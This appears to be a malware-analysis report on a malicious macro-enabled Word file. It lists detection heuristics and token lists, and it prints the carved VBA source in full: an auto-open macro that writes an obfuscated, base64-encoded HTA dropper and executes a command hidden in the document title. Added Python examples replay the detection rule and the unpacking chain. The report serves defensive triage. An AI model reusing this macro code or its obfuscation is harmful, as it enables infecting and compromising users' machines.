Verdict: MALICIOUS
Risk score: 172
Heuristics: 7
- VBA project inside OOXML (medium, OOXML_VBA; 4 related findings): Document contains a VBA project — VBA macros present.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: `CreateObject("wscript.shell").exec (sr(viewOption))`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `CreateObject("wscript.shell").exec (sr(viewOption))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub autoopen()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed here was found in document text (OOXML body / shared strings), and every one is an XML namespace identifier: OOXML part schemas, plus XMP, RDF, Dublin Core and Photoshop metadata namespaces of the kind typically carried by embedded image metadata. None is referenced by the macro and none is a network indicator.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
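An added example (not the analyzer's code) that emulates the OLE_VBA_PCODE_AUTOEXEC_EXEC co-occurrence rule described above, using the two token lists the heuristic names. How the analyzer actually tokenizes p-code is not shown on this page; the emulation scans stream text as-is with identifier-boundary matching, which is what lets `Shell` fire on `wscript.shell` in the quoted matched line. The stream names and sample lines are constructed from the lines this report quotes.

```python
import re

# Added example, not the analyzer's implementation. Token lists are the ones
# the OLE_VBA_PCODE_AUTOEXEC_EXEC description gives; the stream samples are
# constructed here from the lines quoted in the report.

AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(tokens, stream):
    """Return the tokens present in `stream` (str or raw bytes).
    Matching is case-insensitive (VBA identifiers are) and bounded by
    non-identifier characters, so 'wscript.shell' matches Shell while
    'Shellfish' would not."""
    if isinstance(stream, bytes):
        stream = stream.decode("latin-1")
    hits = []
    for tok in tokens:
        pat = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pat, stream, re.IGNORECASE):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream):
    """Fire only when at least one auto-exec entry point AND at least one
    execution token occur in the same stream; either list alone is not enough."""
    auto = find_tokens(AUTOEXEC_TOKENS, stream)
    exe = find_tokens(EXEC_TOKENS, stream)
    return {"fired": bool(auto and exe), "autoexec": auto, "exec": exe}


def scan_streams(streams):
    """Apply the rule per stream, as the description requires ('the same
    stream'). The document is flagged only if some single stream fires."""
    per_stream = {name: pcode_autoexec_exec(data) for name, data in streams.items()}
    return any(r["fired"] for r in per_stream.values()), per_stream


# Constructed samples (not carved from the sample): the quoted lines together
# in one stream, then the same lines split across two streams.
COMBINED = (b'Sub autoopen()\r\n    borderRef\r\nEnd Sub\r\n'
            b'Public Sub button1_Click()\r\n'
            b'    CreateObject("wscript.shell").exec (sr(viewOption))\r\nEnd Sub\r\n')
SPLIT = {
    "module_a": b'Public Sub button1_Click()\r\n'
                b'    CreateObject("wscript.shell").exec (sr(viewOption))\r\nEnd Sub\r\n',
    "module_b": b'Sub autoopen()\r\n    borderRef\r\nEnd Sub\r\n',
}

if __name__ == "__main__":
    print("combined:", pcode_autoexec_exec(COMBINED))
    fired, detail = scan_streams(SPLIT)
    print("split fired:", fired, detail)
```

Running it shows the combined stream firing with `AutoOpen` paired with `Shell` and `CreateObject`, while the split streams do not fire for either stream: the rule is about where the tokens sit, not merely whether both exist somewhere in the file.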
Extracted artifacts: 2

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6215 bytes | b8f85c801db67b122681d942f1a11dc2dc2cfe14df910b803ca1ae388eb2cf61 | No threats found | likely: carved artifact contains 8 long base64-like blob(s) |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{43CAA782-E7DA-4CFB-8BE0-552D6EC7AEBD}{EA7827B2-5BAD-4216-85C7-C15CB3D74A76}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub button1_Click()
Set viewOption = ActiveDocument.BuiltInDocumentProperties("title")
CreateObject("wscript.shell").exec (sr(viewOption))
End Sub
Attribute VB_Name = "mainPasteArgument"
Sub autoopen()
borderRef
End Sub
Function sr(textRightSwap)
sr = VBA.StrReverse(textRightSwap)
End Function
Sub borderRef()
Dim valueLibLen As String
deleteABuffer = Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), " ")
valueLibLen = deleteABuffer(1)
Set arrayVbSize = New collectionLocalRef
arrayVbSize.viewGenericBorder valueLibLen, textFunc
frm.button1_Click
End Sub
Attribute VB_Name = "indexSwap"
Public Function storageRightGeneric(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("<html><body><div id='content1'>fTtlc29sYy5ldGVsZURlY2Fwc2VtYU50Y3VydHM7KTIgLCJncGouYmlMcG1ldFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvd", "GV2YXMuZXRlbGVEZWNhcHNlbWFOdGN1cnRzOyl5ZG9iZXNub3BzZXIueXJldVFlc2FiYXRhZChldGlydy5ldGVsZURlY2Fwc2VtYU50Y3VydHM7MSA9IGVweXQuZXRlb", "GVEZWNhcHNlbWFOdGN1cnRzO25lcG8uZXRlbGVEZWNhcHNlbWFOdGN1cnRzOykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGV0ZWxlRGVjYXBzZW1hT", "nRjdXJ0cyByYXZ7KTAwMiA9PSBzdXRhdHMueXJldVFlc2FiYXRhZChmaTspKGRuZXMueXJldVFlc2FiYXRhZDspZXNsYWYgLCJ1UWFCQj0manRpRjFVcnJFWDFVQUZiU", "kx6QT1oY3JhZXMmb1FUeGVXYWJpRGk4ZGVHcWF1ZT1yZXN1JmxGZkRXYWNBcDlOPWVtaXQmR2E3NzJRRkd2RklQZz1kaWMmVmx0eEdodUVic0R0PUhPeXYmVmFWcDU9W", "Tg2SWN3JlNZaHVOcDB4PWRpcz80dnlsL1ZrU0llN0JGU3duL1VmelNlS2toUlRGYkllZ1FjTWYyZTVoNGI5LzB4RWUvTXFqU0F6N29lcm9rbmx5SzkxdTllTkRBTXBTQ", "XJhL25RTFRlSktMYUFyalFJaEFxVDg2e"), "")
End If
storageRightGeneric = rightSizeFunc
End Function
Public Function referenceReferenceGlobal(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("W5zVHBaNnZCWndYazlCTWZMSzB0Qi9JWW5pNUNhVmdSRDRvckovMDcyNzYvc29zZ2QvbW9jLmF5ZWxkdWRlY25lc3NlLy86cHR0aCIgLCJURUciKG5lcG8ueXJldVFlc", "2FiYXRhZDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHlyZXVRZXNhYmF0YWQgcmF2</div><div id='content2'>fXspcmV0bnVvQ25pYU1l", "dm9tZXIoaGN0YWN9OykiYXRoLmJpTHBtZXRcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmZXRlbGVkLnNzYWxDd2VpVnJvdGFyZXRpe3lydDspInRjZWpib21ldHN5c2Vs", "aWYuZ25pdHBpcmNzIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHNzYWxDd2VpVnJvdGFyZXRpIHJhdjspInRpbkluaWd1bFAsZ3BqLmJpTHBtZXRcXGNpbGJ1cFxcc3Jlc3Vc", "XDpjIDIzbGxkbnVyIihudXIuKSJsbGVocy50cGlyY3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==</div><div id='content3'></div><div id='table1'>ABCDEFGH", "IJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/</div><div id='table3'></div><script language='javascript'>function nextReq", "uest(borderLibDocument){return(n"), "")
End If
referenceReferenceGlobal = rightSizeFunc
End Function
Public Function loadView(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("ew ActiveXObject(borderLibDocument));}function tableViewBorder(iteratorArgumentBorder){return(libWindowTemp.getElementById(itera", "torArgumentBorder).innerHTML);}function textBorderText(){var vbTemp = tableViewBorder('table1');var memLeft = vbTemp.toLowerCase", "();var vbPaste = tableViewBorder('table2');return(vbTemp + memLeft + vbPaste);}function valueDocumentLen(s){var e={}; var i; var", " b=0; var c; var x; var l=0; var a; var captionStorage=''; var w=String.fromCharCode; var L=s.length;var deleteOption = indexInd", "exGlobal('tArahc');for(i=0;i<64;i++){e[textBorderText()[deleteOption](i)]=i;}for(x=0;x<L;x++){c=e[s[deleteOption](x)];b=(b<<6)+c", ";l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(captionStorage+=w(a));}}return(captionStorage);};function indexIndexGloba", "l(mainDataIndex){return mainData"), "")
End If
loadView = rightSizeFunc
End Function
Public Function requestValue(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("Index.split('').reverse().join('');}tempBorderSize = window;libWindowTemp = document;tempBorderSize.resizeTo(1, 1);tempBorderSiz", "e.moveTo(-100, -100);var selectReference = libWindowTemp.getElementById('content1').innerHTML;var bufConstText = libWindowTemp.g", "etElementById('content2').innerHTML;var selectReference = indexIndexGlobal(valueDocumentLen(selectReference));var bufConstText =", " indexIndexGlobal(valueDocumentLen(bufConstText));</script><script language='javascript'>function memOptionBuffer(textStorageVar", "){var databaseException = nextRequest(indexIndexGlobal('lortnoctpircs.lortnoctpircssm'));databaseException['Language'] = 'jscrip", "t';databaseException['Timeout'] = 60000;databaseException['AddCode'](textStorageVar);return(null);}</script><script language='vb", "script'>Call memOptionBuffer(sel"), "")
End If
requestValue = rightSizeFunc
End Function
Public Function refTempReference(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("ectReference) : Call memOptionBuffer(bufConstText)</script><script language='javascript'>tempBorderSize['close']();</script></bo", "dy></html>"), "")
End If
refTempReference = rightSizeFunc
End Function
Function textFunc()
textFunc = storageRightGeneric("elec") + referenceReferenceGlobal("opyA") + loadView("ptio") + requestValue("indo") + refTempReference("aria")
End Function
Attribute VB_Name = "collectionLocalRef"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function viewGenericBorder(selectTextboxBuffer As String, lenTempTemp As String)
Open selectTextboxBuffer For Output As #1
Print #1, lenTempTemp
Close #1
End Function
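As an added example (not the analyzer's output and not the sample's real data), the unpacking chain that the preview above implements, replayed in Python on constructed placeholders: the document Title is reversed and split on spaces (borderRef, sr), the HTA text is reassembled from the Join(Array(...)) literals in source order (textFunc) and written to the path taken from element 1 of the split title (viewGenericBorder), the whole reversed title is run through WScript.Shell (button1_Click), and inside the HTA each content div is base64-decoded and reversed (valueDocumentLen, indexIndexGlobal) before AddCode hands it to an ActiveX object whose ProgID is the reversed literal 'lortnoctpircs.lortnoctpircssm'. The real Title value, drop path and decoded stages are not in this report; the launcher name, path and stage strings below are placeholders built here so the script runs offline.

```python
import base64
import re

# Added example, not part of the report: replays the unpacking chain from the
# macros.bas preview on constructed inputs. The sample's real Title property,
# drop path and decoded stages are NOT in this report; the values below are
# placeholders.


def rev(s):
    """StrReverse in the VBA and indexIndexGlobal() in the HTA: plain reversal."""
    return s[::-1]


def unpack_title(title):
    """borderRef()/button1_Click(): the Title is reversed and split on spaces;
    element 1 is the path the HTA is written to, and the whole reversed string
    is passed to WScript.Shell.Exec."""
    command = rev(title)
    parts = command.split(" ")
    drop_path = parts[1] if len(parts) > 1 else None
    return command, drop_path


def rebuild_from_vba(vba_source):
    """textFunc() concatenates the Join(Array("..", ".."), "") results of the
    helper functions in source order; collect the literals the same way.
    Assumes, as in this sample, that source order equals concatenation order."""
    out = []
    for arr in re.findall(r'Join\(Array\((.*?)\),\s*""\)', vba_source, re.S):
        out.extend(re.findall(r'"([^"]*)"', arr))
    return "".join(out)


def extract_divs(html):
    """tableViewBorder(): innerHTML of each <div id='...'> in the dropped page."""
    return dict(re.findall(r"<div id='([^']+)'>(.*?)</div>", html, re.S))


def decode_stage(blob):
    """valueDocumentLen() then indexIndexGlobal(): the HTA's hand-rolled decoder
    rebuilds the standard base64 alphabet from table1/table2 (A-Z, a-z, 0-9, +, /),
    so standard base64 decoding followed by reversal reproduces the stage."""
    padded = blob + "=" * (-len(blob) % 4)
    return rev(base64.b64decode(padded).decode("latin-1"))


def unpack_hta(html):
    """Decode every non-empty content<N> div of the dropped page."""
    return {k: decode_stage(v) for k, v in extract_divs(html).items()
            if k.startswith("content") and v}


# ---- constructed placeholders (not the sample's data) ----

def encode_stage(script):
    """Inverse of decode_stage: reverse first, then base64."""
    return base64.b64encode(rev(script).encode("latin-1")).decode("ascii")


CONSTRUCTED_TITLE = rev("launcher.exe c:\\users\\public\\stage.hta")  # placeholder

CONSTRUCTED_HTA = (
    "<html><body><div id='content1'>" + encode_stage("var stage = 'one';")
    + "</div><div id='content2'>" + encode_stage("var stage = 'two';")
    + "</div><div id='content3'></div><div id='table1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div>"
      "<div id='table2'>0123456789+/</div></body></html>"
)


def constructed_vba(html, width=40):
    """Carry html in Join(Array(...)) literals the way the macro's helpers do."""
    chunks = [html[i:i + width] for i in range(0, len(html), width)]
    literals = ", ".join('"%s"' % c for c in chunks)
    return ('Public Function f(x)\r\n    r = Join(Array(%s), "")\r\n'
            '    f = r\r\nEnd Function\r\n') % literals


if __name__ == "__main__":
    cmd, path = unpack_title(CONSTRUCTED_TITLE)
    print("command:", cmd)
    print("drop path:", path)
    html = rebuild_from_vba(constructed_vba(CONSTRUCTED_HTA))
    for name, code in unpack_hta(html).items():
        print(name, "->", code)
    # Two literals from the preview that are only reversed, never encoded:
    print(rev("lortnoctpircs.lortnoctpircssm"), rev("tArahc"))
```

Feeding the real content1/content2 blobs from the preview to decode_stage, after concatenating the Join chunks in source order, recovers the sample's actual stages; the placeholders here only prove that the chain is base64 followed by reversal, which is why the two plain reversed literals (the ActiveX ProgID and the `charAt` method name) decode with rev alone.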
| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 30208 bytes | 4489c8a08a6cec1486df34ce423bbe33de091b858734ff303d32780b15d95773 | No threats found | likely: carved artifact contains 8 long base64-like blob(s) |